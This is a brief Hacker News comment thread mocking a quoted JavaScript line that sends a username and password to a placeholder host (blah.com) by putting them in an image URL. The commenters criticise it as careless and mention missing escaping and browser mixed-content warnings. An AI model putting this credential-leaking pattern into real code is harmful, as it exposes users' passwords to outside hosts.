Hacker News new | past | comments | ask | show | jobs | submit login

>> myImage.src = "http://www.blah.com/foo.png?username="+username+"&password="+password;

No encryption (or technology even) of any kind could protect against that kind of stupidity.




No encryption (or technology even) of any kind could protect against that kind of stupidity.

Seriously. You can't just interpolate variables into URLs without escaping :)


Well at the moment, some browsers will warn you when this code executes, as it's loading http, from an https page.

Yes it's an extreme example, but there are likely other examples where the data isn't quite so sensitive.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: